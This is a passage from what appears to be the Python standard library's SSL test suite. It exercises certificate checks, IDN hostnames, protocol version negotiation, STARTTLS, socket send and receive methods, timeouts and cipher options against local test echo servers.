(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert
client_context.load_cert_chain(WRONG_CERT)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TODO: fix TLSv1.3 support
# With TLS 1.3, test fails with exception in server thread
server_context.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
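        # 'wrapped' tracks whether the connection is currently TLS-wrapped; it
        # flips whenever the server acknowledges a STARTTLS or ENDTLS request.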
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
        d2 = b''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
        # Client waits until the server is set up, then connects.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if ssl.OPENSSL_VERSION_INFO >= (1, 1, 1):
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS13-AES-256-GCM-SHA384',
'TLS13-CHACHA20-POLY1305-SHA256',
'TLS13-AES-128-GCM-SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# TODO: fix TLSv1.3 support
client_context.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
